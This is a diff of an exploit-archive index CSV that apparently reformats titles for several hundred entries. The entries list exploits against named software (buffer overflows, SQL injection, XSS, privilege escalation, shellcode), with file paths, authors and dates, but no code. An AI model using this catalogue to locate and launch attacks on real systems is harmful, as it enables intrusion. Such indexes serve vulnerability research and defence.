-37986,platforms/windows/dos/37986.txt,"Xion Audio Player 1.5 build 155 Stack Based Buffer Overflow",2015-08-27,Un_N0n,windows,dos,0 +37986,platforms/windows/dos/37986.txt,"Xion Audio Player 1.5 build 155 - Stack Based Buffer Overflow",2015-08-27,Un_N0n,windows,dos,0 37987,platforms/linux/local/37987.py,"FENIX 0.92 - Buffer Overflow",2015-08-27,"Juan Sacco",linux,local,0 37988,platforms/linux/local/37988.py,"BSIGN 0.4.5 - Buffer Overflow",2015-08-27,"Juan Sacco",linux,local,0 37989,platforms/php/webapps/37989.txt,"IP.Board 4.X - Stored XSS",2015-08-27,snop,php,webapps,0 @@ -34330,7 +34325,7 @@ id,file,description,date,author,platform,type,port 38013,platforms/windows/remote/38013.py,"PCMan FTP Server 2.0.7 - RENAME Command Buffer Overflow",2015-08-29,Koby,windows,remote,21 38014,platforms/windows/dos/38014.py,"Sysax Multi Server 6.40 - SSH Component Denial of Service",2015-08-29,3unnym00n,windows,dos,22 38015,platforms/php/webapps/38015.txt,"AR Web Content Manager - (AWCM) cookie_gen.php Arbitrary Cookie Generation Weakness",2012-11-08,"Sooel Son",php,webapps,0 -38016,platforms/multiple/webapps/38016.txt,"ESRI ArcGIS for Server 'where' Form Field SQL Injection",2012-11-09,anonymous,multiple,webapps,0 +38016,platforms/multiple/webapps/38016.txt,"ESRI ArcGIS for Server - 'where' Form Field SQL Injection",2012-11-09,anonymous,multiple,webapps,0 38017,platforms/php/webapps/38017.txt,"WordPress Kakao Theme - 'ID' Parameter SQL Injection",2012-11-09,sil3nt,php,webapps,0 38018,platforms/php/webapps/38018.txt,"WordPress PHP Event Calendar Plugin - 'cid' Parameter SQL Injection",2012-11-09,"Ashiyane Digital Security Team",php,webapps,0 38019,platforms/php/webapps/38019.txt,"WordPress Eco-annu Plugin - 'eid' Parameter SQL Injection",2012-11-09,"Ashiyane Digital Security Team",php,webapps,0 @@ -34350,7 +34345,7 @@ id,file,description,date,author,platform,type,port 38034,platforms/hardware/webapps/38034.txt,"Cyberoam Firewall CR500iNG-XP - 10.6.2 MR-1 - Blind SQL Injection",2015-08-31,"Dharmendra Kumar Singh",hardware,webapps,0 38035,platforms/windows/local/38035.pl,"Boxoft WAV to MP3 Converter - convert Feature Buffer Overflow",2015-08-31,"Robbie Corley",windows,local,0 38036,platforms/osx/local/38036.rb,"Apple OS X Entitlements - 'Rootpipe' Privilege Escalation",2015-08-31,Metasploit,osx,local,0 -38037,platforms/php/webapps/38037.html,"Open-Realty 2.5.8 Cross-Site Request Forgery",2012-11-16,"Aung Khant",php,webapps,0 +38037,platforms/php/webapps/38037.html,"Open-Realty 2.5.8 - Cross-Site Request Forgery",2012-11-16,"Aung Khant",php,webapps,0 38038,platforms/multiple/dos/38038.txt,"Splunk 4.3.1 - Denial of Service",2012-11-19,"Alexander Klink",multiple,dos,0 38039,platforms/php/webapps/38039.txt,"openSIS - 'modname' Parameter Local File Inclusion",2012-11-20,"Julian Horoszkiewicz",php,webapps,0 38040,platforms/php/webapps/38040.txt,"ATutor - 'tool_file' Parameter Local File Inclusion",2012-11-16,"Julian Horoszkiewicz",php,webapps,0 @@ -34358,11 +34353,11 @@ id,file,description,date,author,platform,type,port 38042,platforms/php/webapps/38042.txt,"dotProject 2.1.x - index.php Multiple Parameter SQL Injection",2012-11-21,"High-Tech Bridge",php,webapps,0 38043,platforms/php/webapps/38043.txt,"dotProject 2.1.x - index.php Multiple Parameter XSS",2012-11-21,"High-Tech Bridge",php,webapps,0 38044,platforms/php/webapps/38044.txt,"Feng Office Security Bypass and HTML Injection Vulnerabilities",2012-11-21,Ur0b0r0x,php,webapps,0 -38045,platforms/php/webapps/38045.html,"XiVO Cross-Site Request Forgery",2012-11-21,"Francis Provencher",php,webapps,0 +38045,platforms/php/webapps/38045.html,"XiVO - Cross-Site Request Forgery",2012-11-21,"Francis Provencher",php,webapps,0 38046,platforms/php/webapps/38046.txt,"WordPress Zingiri Web Shop Plugin - 'path' Parameter Arbitrary File Upload",2012-11-22,"Ashiyane Digital Security Team",php,webapps,0 38047,platforms/php/webapps/38047.txt,"WordPress Webplayer Plugin - 'id' Parameter SQL Injection",2012-11-22,"Novin hack",php,webapps,0 38048,platforms/php/webapps/38048.txt,"WordPress Plg Novana Plugin - 'id' Parameter SQL Injection",2012-11-22,sil3nt,php,webapps,0 -38049,platforms/multiple/remote/38049.txt,"Greenstone Multiple Security Vulnerabilities",2012-11-23,AkaStep,multiple,remote,0 +38049,platforms/multiple/remote/38049.txt,"Greenstone - Multiple Security Vulnerabilities",2012-11-23,AkaStep,multiple,remote,0 38050,platforms/php/webapps/38050.txt,"WordPress Zarzadzonie Kontem Plugin - 'ajaxfilemanager.php' Script Arbitrary File Upload",2012-11-22,"Ashiyane Digital Security Team",php,webapps,0 38051,platforms/php/webapps/38051.txt,"Bedita 3.5.1 - XSS",2015-09-01,"Sébastien Morin",php,webapps,80 38052,platforms/windows/dos/38052.py,"Ricoh DC (SR10) 1.1.0.8 - Denial of Service",2015-09-01,j2x6,windows,dos,21 @@ -34371,7 +34366,7 @@ id,file,description,date,author,platform,type,port 38055,platforms/windows/dos/38055.txt,"XGI Windows VGA Display Manager 6.14.10.1090 - Arbitrary Write PoC",2015-09-01,KoreLogic,windows,dos,0 38056,platforms/hardware/webapps/38056.txt,"Edimax BR6228nS/BR6228nC - Multiple Vulnerabilities",2015-09-01,smash,hardware,webapps,80 38057,platforms/php/webapps/38057.txt,"WordPress Magazine Basic Theme - 'id' Parameter SQL Injection",2012-11-22,"Novin hack",php,webapps,0 -38058,platforms/ios/remote/38058.py,"Twitter for iPhone Man in the Middle Security",2012-11-23,"Carlos Reventlov",ios,remote,0 +38058,platforms/ios/remote/38058.py,"Twitter for iPhone - Man in the Middle Security",2012-11-23,"Carlos Reventlov",ios,remote,0 38059,platforms/bsd/dos/38059.c,"OpenBSD 4.x - Portmap Remote Denial of Service",2012-11-22,auto236751,bsd,dos,0 38060,platforms/php/webapps/38060.txt,"WordPress Ads Box Plugin - 'count' Parameter SQL Injection",2012-11-26,"Ashiyane Digital Security Team",php,webapps,0 38061,platforms/php/webapps/38061.txt,"Beat Websites - 'id' Parameter SQL Injection",2012-11-24,Metropolis,php,webapps,0 @@ -34406,18 +34401,18 @@ id,file,description,date,author,platform,type,port 38137,platforms/osx/local/38137.txt,"OS X Install.framework - Arbitrary mkdir / unlink and chown to admin Group",2015-09-10,"Google Security Research",osx,local,0 38094,platforms/lin_x86/shellcode/38094.c,"Linux/x86 - Create file with permission 7775 and exit shellcode (Generator)",2015-09-07,"Ajith Kp",lin_x86,shellcode,0 38095,platforms/windows/local/38095.pl,"VeryPDF HTML Converter 2.0 - SEH/ToLower() Bypass Buffer Overflow",2015-09-07,"Robbie Corley",windows,local,0 -38096,platforms/linux/remote/38096.rb,"Endian Firewall Proxy Password Change Command Injection",2015-09-07,Metasploit,linux,remote,10443 +38096,platforms/linux/remote/38096.rb,"Endian Firewall Proxy - Password Change Command Injection",2015-09-07,Metasploit,linux,remote,10443 38097,platforms/hardware/webapps/38097.txt,"NETGEAR Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation",2015-09-07,"Elliott Lewis",hardware,webapps,80 38098,platforms/jsp/webapps/38098.txt,"JSPMySQL Administrador - Multiple Vulnerabilities",2015-09-07,hyp3rlinx,jsp,webapps,8081 38105,platforms/php/webapps/38105.txt,"WordPress White-Label Framework 2.0.6 Theme - XSS",2015-09-08,Outlasted,php,webapps,80 38108,platforms/windows/dos/38108.txt,"Advantech WebAccess 8.0 / 3.4.3 ActiveX - Multiple Vulnerabilities",2015-09-08,"Praveen Darshanam",windows,dos,0 -38109,platforms/linux/remote/38109.pl,"Oracle MySQL and MariaDB Insecure Salt Generation Security Bypass Weakness",2012-12-06,kingcope,linux,remote,0 +38109,platforms/linux/remote/38109.pl,"Oracle MySQL / MariaDB - Insecure Salt Generation Security Bypass Weakness",2012-12-06,kingcope,linux,remote,0 38110,platforms/php/webapps/38110.txt,"DirectAdmin Web Control Panel 1.483 - Multiple Vulnerabilities",2015-09-08,"Ashiyane Digital Security Team",php,webapps,0 -38111,platforms/php/webapps/38111.txt,"WordPress Simple Gmail Login Plugin Stack Trace Information Disclosure",2012-12-07,"Aditya Balapure",php,webapps,0 +38111,platforms/php/webapps/38111.txt,"WordPress Simple Gmail Login Plugin - Stack Trace Information Disclosure",2012-12-07,"Aditya Balapure",php,webapps,0 38112,platforms/php/webapps/38112.txt,"FOOT Gestion - 'id' Parameter SQL Injection",2012-12-07,"Emmanuel Farcy",php,webapps,0 -38113,platforms/php/webapps/38113.php,"VBulletin ajaxReg Module SQL Injection",2012-12-08,"Cold Zero",php,webapps,0 -38114,platforms/cgi/webapps/38114.html,"Smartphone Pentest Framework Multiple Remote Command Execution Vulnerabilities",2012-12-10,"High-Tech Bridge",cgi,webapps,0 -38115,platforms/php/webapps/38115.txt,"SimpleInvoices invoices Module Unspecified Customer Field XSS",2012-12-10,tommccredie,php,webapps,0 +38113,platforms/php/webapps/38113.php,"VBulletin ajaxReg Module - SQL Injection",2012-12-08,"Cold Zero",php,webapps,0 +38114,platforms/cgi/webapps/38114.html,"Smartphone Pentest Framework - Multiple Remote Command Execution Vulnerabilities",2012-12-10,"High-Tech Bridge",cgi,webapps,0 +38115,platforms/php/webapps/38115.txt,"SimpleInvoices invoices Module - Unspecified Customer Field XSS",2012-12-10,tommccredie,php,webapps,0 38116,platforms/lin_x86/shellcode/38116.c,"Linux/x86 - execve(_/bin/cat__ [_/bin/cat__ _/etc/passwd_]_ NULL) shellcode (75 bytes)",2015-09-09,"Ajith Kp",lin_x86,shellcode,0 38118,platforms/xml/webapps/38118.txt,"Qlikview 11.20 SR11 - Blind XXE Injection",2015-09-09,"Alex Haynes",xml,webapps,0 38119,platforms/php/webapps/38119.html,"Auto-Exchanger 5.1.0 - CSRF",2015-09-09,"Aryan Bayaninejad",php,webapps,0 @@ -34431,13 +34426,13 @@ id,file,description,date,author,platform,type,port 38127,platforms/php/webapps/38127.php,"php - cgimode fpm writeprocmemfile bypass disable function demo",2015-09-10,ylbhz,php,webapps,0 38128,platforms/cgi/webapps/38128.txt,"Synology Video Station 1.5-0757 - Multiple Vulnerabilities",2015-09-10,"Han Sahin",cgi,webapps,5000 38129,platforms/php/webapps/38129.txt,"Octogate UTM 3.0.12 - Admin Interface Directory Traversal",2015-09-10,"Oliver Karow",php,webapps,0 -38130,platforms/java/webapps/38130.txt,"N-able N-central Cross-Site Request Forgery",2012-12-13,"Cartel Informatique Security Research Labs",java,webapps,0 +38130,platforms/java/webapps/38130.txt,"N-able N-central - Cross-Site Request Forgery",2012-12-13,"Cartel Informatique Security Research Labs",java,webapps,0 38131,platforms/php/webapps/38131.txt,"PHP Address Book - 'group' Parameter Cross-Site Scripting",2012-12-13,"Kenneth F. Belva",php,webapps,0 38132,platforms/linux/dos/38132.py,"Linux Kernel 3.3.5 - Btrfs CRC32C feature Infinite Loop Local Denial of Service",2012-12-13,"Pascal Junod",linux,dos,0 38133,platforms/php/webapps/38133.txt,"RokBox Plugin for WordPress - /wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf abouttext Parameter XSS",2012-12-17,MustLive,php,webapps,0 38134,platforms/php/webapps/38134.txt,"Joomla! ZT Autolinks Component - 'controller' Parameter Local File Inclusion",2012-12-19,Xr0b0t,php,webapps,0 38135,platforms/php/webapps/38135.txt,"Joomla! Bit Component - 'controller' Parameter Local File Inclusion",2012-12-19,Xr0b0t,php,webapps,0 -38138,platforms/osx/local/38138.txt,"OS X Install.framework suid Helper Privilege Escalation",2015-09-10,"Google Security Research",osx,local,0 +38138,platforms/osx/local/38138.txt,"OS X - Install.framework suid Helper Privilege Escalation",2015-09-10,"Google Security Research",osx,local,0 38139,platforms/php/webapps/38139.txt,"MyBB Transactions Plugin - 'transaction' Parameter SQL Injection",2012-12-18,limb0,php,webapps,0 38140,platforms/php/webapps/38140.php,"VoipNow Service Provider Edition - Remote Arbitrary Command Execution",2012-12-21,i-Hmx,php,webapps,0 38141,platforms/php/webapps/38141.txt,"Hero Framework - search q Parameter XSS",2012-12-24,"Stefan Schurtz",php,webapps,0 @@ -34464,18 +34459,18 @@ id,file,description,date,author,platform,type,port 38161,platforms/php/webapps/38161.txt,"osTicket - l.php url Parameter Arbitrary Site Redirect",2013-01-02,AkaStep,php,webapps,0 38162,platforms/php/webapps/38162.txt,"osTicket - tickets.php status Parameter XSS",2013-01-02,AkaStep,php,webapps,0 38163,platforms/php/webapps/38163.txt,"WordPress Uploader Plugin - Arbitrary File Upload",2013-01-03,"Sammy FORGIT",php,webapps,0 -38164,platforms/hardware/remote/38164.py,"Belkin Wireless Router Default WPS PIN Security",2013-01-03,ZhaoChunsheng,hardware,remote,0 +38164,platforms/hardware/remote/38164.py,"Belkin Wireless Router Default - WPS PIN Security",2013-01-03,ZhaoChunsheng,hardware,remote,0 38165,platforms/windows/dos/38165.txt,"IKEView.exe Fox beta 1 - Stack Buffer Overflow",2015-09-13,hyp3rlinx,windows,dos,0 38166,platforms/php/webapps/38166.txt,"WHMCS 5.0 - Insecure Cookie Authentication Bypass",2012-12-31,Agd_Scorp,php,webapps,0 38167,platforms/php/webapps/38167.php,"WordPress Multiple WPScientist Themes - Arbitrary File Upload",2013-01-04,JingoBD,php,webapps,0 38168,platforms/php/webapps/38168.txt,"TomatoCart - 'json.php' Security Bypass",2013-01-04,"Aung Khant",php,webapps,0 38169,platforms/php/webapps/38169.txt,"Havalite CMS - 'comment' Parameter HTML Injection",2013-01-06,"Henri Salo",php,webapps,0 -38170,platforms/android/remote/38170.txt,"Facebook for Android 'LoginActivity' Information Disclosure",2013-01-07,"Takeshi Terada",android,remote,0 +38170,platforms/android/remote/38170.txt,"Facebook for Android - 'LoginActivity' Information Disclosure",2013-01-07,"Takeshi Terada",android,remote,0 38171,platforms/php/webapps/38171.txt,"Joomla! Incapsula Component - Multiple Cross-Site Scripting Vulnerabilities",2013-01-08,"Gjoko Krstic",php,webapps,0 38178,platforms/php/webapps/38178.txt,"WordPress NextGEN Gallery Plugin - 'test-head' Parameter Cross-Site Scripting",2013-01-08,Am!r,php,webapps,0 38173,platforms/multiple/webapps/38173.txt,"ManageEngine EventLog Analyzer < 10.6 build 10060 - SQL Query Execution",2015-09-14,xistence,multiple,webapps,0 38174,platforms/multiple/webapps/38174.txt,"ManageEngine OpManager 11.5 - Multiple Vulnerabilities",2015-09-14,xistence,multiple,webapps,0 -38179,platforms/multiple/remote/38179.txt,"Dell OpenManage Server Administrator Cross-Site Scripting",2013-01-09,"Tenable NS",multiple,remote,0 +38179,platforms/multiple/remote/38179.txt,"Dell OpenManage Server Administrator - Cross-Site Scripting",2013-01-09,"Tenable NS",multiple,remote,0 38180,platforms/php/webapps/38180.txt,"TinyBrowser - /tiny_mce/plugins/tinybrowser/edit.php type Parameter XSS",2013-01-09,MustLive,php,webapps,0 38176,platforms/php/webapps/38176.txt,"EZ SQL Reports < 4.11.37 - Multiple Vulnerabilities",2015-09-14,"Felipe Molina",php,webapps,0 38177,platforms/windows/dos/38177.txt,"IKEView.exe R60 - Stack Buffer Overflow",2015-09-14,hyp3rlinx,windows,dos,0 @@ -34500,9 +34495,9 @@ id,file,description,date,author,platform,type,port 38200,platforms/windows/local/38200.txt,"Windows Task Scheduler - DeleteExpiredTaskAfter File Deletion Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0 38201,platforms/windows/local/38201.txt,"Windows - CreateObjectTask TileUserBroker Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0 38202,platforms/windows/local/38202.txt,"Windows - CreateObjectTask SettingsSyncDiagnostics Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0 -38205,platforms/multiple/dos/38205.py,"BT Home Hub 'uuid' field Buffer Overflow",2013-01-08,"Zachary Cutlip",multiple,dos,0 -38206,platforms/windows/remote/38206.html,"Samsung Kies Remote Buffer Overflow",2013-01-09,"High-Tech Bridge",windows,remote,0 -38207,platforms/php/webapps/38207.txt,"Quick.Cms/Quick.Cart Cross-Site Scripting",2013-01-09,"High-Tech Bridge",php,webapps,0 +38205,platforms/multiple/dos/38205.py,"BT Home Hub - 'uuid' field Buffer Overflow",2013-01-08,"Zachary Cutlip",multiple,dos,0 +38206,platforms/windows/remote/38206.html,"Samsung Kies - Remote Buffer Overflow",2013-01-09,"High-Tech Bridge",windows,remote,0 +38207,platforms/php/webapps/38207.txt,"Quick.Cms/Quick.Cart - Cross-Site Scripting",2013-01-09,"High-Tech Bridge",php,webapps,0 38208,platforms/multiple/dos/38208.py,"Colloquy - Remote Denial of Service",2013-01-09,Aph3x,multiple,dos,0 38209,platforms/php/webapps/38209.txt,"WordPress Gallery Plugin - 'filename_1' Parameter Remote Arbitrary File Access",2013-01-10,Beni_Vanda,php,webapps,0 38210,platforms/php/webapps/38210.txt,"Kirby CMS 2.1.0 - CSRF Content Upload and PHP Script Execution",2015-09-22,"Dawid Golunski",php,webapps,0 @@ -34516,7 +34511,7 @@ id,file,description,date,author,platform,type,port 38218,platforms/windows/local/38218.py,"IKEView.exe R60 - .elg Local SEH Exploit",2015-09-17,cor3sm4sh3r,windows,local,0 38219,platforms/windows/local/38219.py,"ZTE PC UI USB Modem Software - Buffer Overflow",2015-09-17,R-73eN,windows,local,0 38220,platforms/windows/local/38220.py,"IKEView R60 - Buffer Overflow Local Exploit (SEH)",2015-09-17,VIKRAMADITYA,windows,local,0 -38221,platforms/java/remote/38221.rb,"ManageEngine OpManager Remote Code Execution",2015-09-17,Metasploit,java,remote,0 +38221,platforms/java/remote/38221.rb,"ManageEngine OpManager - Remote Code Execution",2015-09-17,Metasploit,java,remote,0 38222,platforms/win_x86-64/local/38222.rb,"Microsoft Windows - Font Driver Buffer Overflow (MS15-078)",2015-09-17,Metasploit,win_x86-64,local,0 38223,platforms/php/webapps/38223.txt,"ZeusCart 4.0 - CSRF",2015-09-17,"Curesec Research Team",php,webapps,80 38224,platforms/php/webapps/38224.txt,"ZeusCart 4.0 - SQL Injection",2015-09-17,"Curesec Research Team",php,webapps,80 @@ -34527,8 +34522,8 @@ id,file,description,date,author,platform,type,port 38229,platforms/php/webapps/38229.txt,"IP.Gallery - 'img' Parameter SQL Injection",2013-01-17,"Ashiyane Digital Security Team",php,webapps,0 38230,platforms/multiple/remote/38230.txt,"Apache OFBiz 10.4.x - Multiple Cross-Site Scripting Vulnerabilities",2013-01-18,"Juan Caillava",multiple,remote,0 38231,platforms/php/webapps/38231.txt,"Scripts Genie Classified Ultra - SQL Injection / Cross-Site Scripting",2013-01-20,3spi0n,php,webapps,0 -38232,platforms/linux/local/38232.txt,"GNU Coreutils 'sort' Text Utility Buffer Overflow",2013-01-21,anonymous,linux,local,0 -38233,platforms/hardware/remote/38233.txt,"F5 Networks BIG-IP XML External Entity Injection",2013-01-21,anonymous,hardware,remote,0 +38232,platforms/linux/local/38232.txt,"GNU Coreutils 'sort' Text Utility - Buffer Overflow",2013-01-21,anonymous,linux,local,0 +38233,platforms/hardware/remote/38233.txt,"F5 Networks BIG-IP - XML External Entity Injection",2013-01-21,anonymous,hardware,remote,0 38234,platforms/php/webapps/38234.txt,"DigiLIBE Execution-After-Redirect Information Disclosure",2013-01-22,"Robert Gilbert",php,webapps,0 38235,platforms/jsp/webapps/38235.txt,"Perforce P4Web - Multiple Cross-Site Scripting Vulnerabilities",2013-01-22,"Christy Philip Mathew",jsp,webapps,0 38236,platforms/php/webapps/38236.txt,"gpEasy CMS - 'section' Parameter Cross-Site Scripting",2013-01-23,"High-Tech Bridge SA",php,webapps,0 @@ -34547,7 +34542,7 @@ id,file,description,date,author,platform,type,port 38250,platforms/multiple/remote/38250.html,"Novell Groupwise Client 8.0 - Multiple Remote Code Execution Vulnerabilities",2013-01-31,"High-Tech Bridge",multiple,remote,0 38251,platforms/php/webapps/38251.txt,"WordPress WP-Table Reloaded Plugin - 'id' Parameter Cross-Site Scripting",2013-01-24,hiphop,php,webapps,0 38252,platforms/windows/remote/38252.py,"Konica Minolta FTP Utility 1.0 - Remote Command Execution",2015-09-20,R-73eN,windows,remote,21 -38254,platforms/windows/remote/38254.rb,"Konica Minolta FTP Utility 1.00 - Post Auth CWD Command SEH Overflow",2015-09-21,Metasploit,windows,remote,21 +38254,platforms/windows/remote/38254.rb,"Konica Minolta FTP Utility 1.00 - Post-Auth CWD Command SEH Overflow",2015-09-21,Metasploit,windows,remote,21 38255,platforms/php/webapps/38255.txt,"Kirby CMS 2.1.0 - Authentication Bypass",2015-09-22,"Dawid Golunski",php,webapps,80 38259,platforms/windows/dos/38259.py,"MASM32 11R - Crash POC",2015-09-22,VIKRAMADITYA,windows,dos,0 38260,platforms/windows/remote/38260.php,"Konica Minolta FTP Utility 1.0 - Directory Traversal",2015-09-22,shinnai,windows,remote,21 @@ -34571,16 +34566,16 @@ id,file,description,date,author,platform,type,port 38278,platforms/win_x86/dos/38278.txt,"Windows Kernel - Use-After-Free with Cursor Object (MS15-097)",2015-09-22,"Nils Sommer",win_x86,dos,0 38279,platforms/win_x86/dos/38279.txt,"Windows Kernel - Use-After-Free with Printer Device Contexts (MS15-097)",2015-09-22,"Nils Sommer",win_x86,dos,0 38280,platforms/win_x86/dos/38280.txt,"Windows Kernel - NtGdiStretchBlt Pool Buffer Overflows (MS15-097)",2015-09-22,"Nils Sommer",win_x86,dos,0 -38281,platforms/windows/dos/38281.txt,"Kaspersky Antivirus VB6 Parsing Integer Overflow",2015-09-22,"Google Security Research",windows,dos,0 -38282,platforms/windows/dos/38282.txt,"Kaspersky Antivirus ExeCryptor Parsing Memory Corruption",2015-09-22,"Google Security Research",windows,dos,0 -38283,platforms/windows/dos/38283.txt,"Kaspersky Antivirus PE Unpacking Integer Overflow",2015-09-22,"Google Security Research",windows,dos,0 -38284,platforms/windows/dos/38284.txt,"Kaspersky Antivirus DEX File Format Parsing Memory Corruption",2015-09-22,"Google Security Research",windows,dos,0 -38285,platforms/windows/dos/38285.txt,"Kaspersky Antivirus CHM Parsing Stack Buffer Overflow",2015-09-22,"Google Security Research",windows,dos,0 -38286,platforms/windows/dos/38286.txt,"Kaspersky Antivirus UPX Parsing Memory Corruption",2015-09-22,"Google Security Research",windows,dos,0 -38287,platforms/windows/local/38287.txt,"Kaspersky Antivirus ThinApp Parser Stack Buffer Overflow",2015-09-22,"Google Security Research",windows,local,0 +38281,platforms/windows/dos/38281.txt,"Kaspersky Antivirus - VB6 Parsing Integer Overflow",2015-09-22,"Google Security Research",windows,dos,0 +38282,platforms/windows/dos/38282.txt,"Kaspersky Antivirus - ExeCryptor Parsing Memory Corruption",2015-09-22,"Google Security Research",windows,dos,0 +38283,platforms/windows/dos/38283.txt,"Kaspersky Antivirus - PE Unpacking Integer Overflow",2015-09-22,"Google Security Research",windows,dos,0 +38284,platforms/windows/dos/38284.txt,"Kaspersky Antivirus - .DEX File Format Parsing Memory Corruption",2015-09-22,"Google Security Research",windows,dos,0 +38285,platforms/windows/dos/38285.txt,"Kaspersky Antivirus - CHM Parsing Stack Buffer Overflow",2015-09-22,"Google Security Research",windows,dos,0 +38286,platforms/windows/dos/38286.txt,"Kaspersky Antivirus - UPX Parsing Memory Corruption",2015-09-22,"Google Security Research",windows,dos,0 +38287,platforms/windows/local/38287.txt,"Kaspersky Antivirus - ThinApp Parser Stack Buffer Overflow",2015-09-22,"Google Security Research",windows,local,0 38288,platforms/windows/dos/38288.txt,"Kaspersky Antivirus - Yoda's Protector Unpacking Memory Corruption",2015-09-22,"Google Security Research",windows,dos,0 38289,platforms/windows/local/38289.txt,"Cisco AnyConnect Secure Mobility Client 3.1.08009 - Privilege Escalation",2015-09-22,"Google Security Research",windows,local,0 -38290,platforms/php/webapps/38290.txt,"WordPress flashnews Theme Multiple Input Validation Vulnerabilities",2013-02-02,MustLive,php,webapps,0 +38290,platforms/php/webapps/38290.txt,"WordPress flashnews Theme - Multiple Input Validation Vulnerabilities",2013-02-02,MustLive,php,webapps,0 38291,platforms/php/webapps/38291.txt,"EasyITSP - 'voicemail.php' Directory Traversal",2013-02-04,"Michal Blaszczak",php,webapps,0 38292,platforms/php/webapps/38292.txt,"refbase 0.9.6 - Multiple Vulnerabilities",2015-09-23,"Mohab Ali",php,webapps,0 38294,platforms/php/webapps/38294.txt,"ezStats2 - 'style.php' Local File Inclusion",2013-02-06,L0n3ly-H34rT,php,webapps,0 @@ -34588,7 +34583,7 @@ id,file,description,date,author,platform,type,port 38296,platforms/php/webapps/38296.txt,"WordPress CommentLuv Plugin - '_ajax_nonce' Parameter Cross-Site Scripting",2013-02-06,"High-Tech Bridge",php,webapps,0 38297,platforms/php/webapps/38297.txt,"WordPress Wysija Newsletters Plugin - Multiple SQL Injection",2013-02-06,"High-Tech Bridge",php,webapps,0 38298,platforms/linux/local/38298.txt,"xNBD - '/tmp/xnbd.log' Insecure Temporary File Handling",2013-02-06,"Sebastian Pipping",linux,local,0 -38299,platforms/windows/local/38299.c,"Symantec Encryption Desktop 10 Local Buffer Overflow Privilege Escalation",2012-02-25,"Nikita Tarakanov",windows,local,0 +38299,platforms/windows/local/38299.c,"Symantec Encryption Desktop 10 - Local Buffer Overflow Privilege Escalation",2012-02-25,"Nikita Tarakanov",windows,local,0 38300,platforms/php/webapps/38300.txt,"WordPress Audio Player Plugin - 'playerID' Parameter Cross-Site Scripting",2013-01-31,hiphop,php,webapps,0 38301,platforms/php/webapps/38301.txt,"WordPress Pinboard Theme - 'tab' Parameter Cross-Site Scripting",2013-02-09,"Henrique Montenegro",php,webapps,0 38302,platforms/multiple/remote/38302.rb,"w3tw0rk / Pitbul IRC Bot - Remote Code Execution",2015-09-23,Metasploit,multiple,remote,6667 @@ -34596,24 +34591,24 @@ id,file,description,date,author,platform,type,port 38304,platforms/php/webapps/38304.py,"SMF (Simple Machine Forum) 2.0.10 - Remote Memory Exfiltration Exploit",2015-09-24,"Filippo Roncari",php,webapps,0 38447,platforms/multiple/local/38447.pl,"libsndfile 1.0.25 - Heap Overflow",2015-10-13,"Marco Romano",multiple,local,0 38307,platforms/win_x86/dos/38307.txt,"Windows Kernel - NtGdiBitBlt Buffer Overflow (MS15-097)",2015-09-24,"Nils Sommer",win_x86,dos,0 -38308,platforms/hardware/remote/38308.txt,"TP-LINK TL-WR2543ND Admin Panel Multiple Cross-Site Request Forgery Vulnerabilities",2013-02-08,"Juan Manuel Garcia",hardware,remote,0 -38309,platforms/php/webapps/38309.txt,"osCommerce Cross-Site Request Forgery",2013-02-12,"Jakub Galczyk",php,webapps,0 -38310,platforms/android/remote/38310.c,"Android 2.3.5 PowerVR SGX Driver Information Disclosure",2011-11-03,"Geremy Condra",android,remote,0 +38308,platforms/hardware/remote/38308.txt,"TP-LINK TL-WR2543ND Admin Panel - Multiple Cross-Site Request Forgery Vulnerabilities",2013-02-08,"Juan Manuel Garcia",hardware,remote,0 +38309,platforms/php/webapps/38309.txt,"osCommerce - Cross-Site Request Forgery",2013-02-12,"Jakub Galczyk",php,webapps,0 +38310,platforms/android/remote/38310.c,"Android 2.3.5 - PowerVR SGX Driver Information Disclosure",2011-11-03,"Geremy Condra",android,remote,0 38311,platforms/php/webapps/38311.txt,"BlackNova Traders - 'news.php' SQL Injection",2013-02-12,ITTIHACK,php,webapps,0 38312,platforms/php/webapps/38312.txt,"AbanteCart - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2013-02-14,LiquidWorm,php,webapps,0 38313,platforms/multiple/remote/38313.html,"Dell SonicWALL Scrutinizer - Multiple HTML Injection Vulnerabilities",2013-02-14,"Benjamin Kunz Mejri",multiple,remote,0 38314,platforms/php/webapps/38314.txt,"WordPress NextGEN Gallery Plugin - Path Disclosure",2013-02-14,"Henrique Montenegro",php,webapps,0 -38315,platforms/php/webapps/38315.txt,"Sonar Multiple Cross-Site Scripting Vulnerabilities",2013-02-12,DevilTeam,php,webapps,0 +38315,platforms/php/webapps/38315.txt,"Sonar - Multiple Cross-Site Scripting Vulnerabilities",2013-02-12,DevilTeam,php,webapps,0 38316,platforms/cgi/webapps/38316.txt,"FortiManager 5.2.2 - Persistent XSS",2015-09-25,hyp3rlinx,cgi,webapps,0 38317,platforms/windows/dos/38317.txt,"FreshFTP 5.52 - .qfl Crash PoC",2015-09-25,Un_N0n,windows,dos,0 -38318,platforms/asp/webapps/38318.txt,"MIMEsweeper For SMTP Multiple Cross-Site Scripting Vulnerabilities",2013-02-18,"Anastasios Monachos",asp,webapps,0 +38318,platforms/asp/webapps/38318.txt,"MIMEsweeper For SMTP - Multiple Cross-Site Scripting Vulnerabilities",2013-02-18,"Anastasios Monachos",asp,webapps,0 38319,platforms/windows/local/38319.py,"WinRar 5.21 - SFX OLE Command Execution",2015-09-25,R-73eN,windows,local,0 38320,platforms/php/webapps/38320.txt,"Squirrelcart - 'table' Parameter Cross-Site Scripting",2013-02-19,"Gjoko Krstic",php,webapps,0 38321,platforms/php/webapps/38321.txt,"X2Engine 4.2 - CSRF",2015-09-25,Portcullis,php,webapps,80 38322,platforms/php/webapps/38322.txt,"CKEditor - 'posteddata.php' Cross-Site Scripting",2013-02-19,AkaStep,php,webapps,0 38323,platforms/php/webapps/38323.txt,"X2Engine 4.2 - Arbitrary File Upload",2015-09-25,Portcullis,php,webapps,80 38324,platforms/php/webapps/38324.txt,"WordPress Pretty Link Plugin - Cross-Site Scripting",2013-02-20,hiphop,php,webapps,0 -38325,platforms/windows/remote/38325.txt,"Alt-N MDaemon WorldClient And WebAdmin Cross-Site Request Forgery",2013-02-18,QSecure,windows,remote,0 +38325,platforms/windows/remote/38325.txt,"Alt-N MDaemon WorldClient And WebAdmin - Cross-Site Request Forgery",2013-02-18,QSecure,windows,remote,0 